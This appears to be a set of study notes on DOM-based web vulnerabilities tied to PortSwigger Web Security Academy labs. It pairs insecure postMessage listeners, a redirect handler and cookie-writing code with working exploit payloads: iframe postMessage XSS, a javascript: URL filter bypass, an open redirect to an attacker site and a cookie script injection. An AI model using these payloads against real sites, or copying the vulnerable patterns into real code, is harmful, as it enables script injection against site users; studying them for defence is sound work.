Sources Sinks
If a website handles web message in an unsafe way, e.g. by not verifying the origin, code in the event listener become potential sinks.
Vulnerable code
<script>
window.addEventListener('message', function(e) {
document.getElementById('name').innerHTML = e.data;
})
</script>
Exploit
<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('<img src=x onerror=print()>','*')">
Vulnerable code
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>
Exploit
<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">
Vulnerable code
<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1]; else location.href = "/"'>Back</a>
Exploit
https://vulnerable-website.com/?url=https://attacker-site.com
Vulnerable code
<a href='https://website.com/product?productId=2'>Last viewed product</a>
<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
Exploit
<iframe src="https://website.com/product?productId=2#'><script>print()</script>"></iframe>
- PortSwigger - Web Security Academy - DOM-based JavaScript injection
- PortSwigger - Web Security Academy - DOM-based document-domain manipulation
- PortSwigger - Web Security Academy - DOM-based WebSocket-URL poisoning
- PortSwigger - Web Security Academy - DOM-based link manipulation
- PortSwigger - Web Security Academy - Web message manipulation
- PortSwigger - Web Security Academy - DOM-based Ajax request-header manipulation
- PortSwigger - Web Security Academy - DOM-based local file-path manipulation
- PortSwigger - Web Security Academy - DOM-based client-side SQL injection
- PortSwigger - Web Security Academy - DOM-based HTML5-storage manipulation
- PortSwigger - Web Security Academy - DOM-based client-side XPath injection
- PortSwigger - Web Security Academy - DOM-based client-side JSON injection
- PortSwigger - Web Security Academy - DOM-data manipulation
- PortSwigger - Web Security Academy - DOM-based denial of service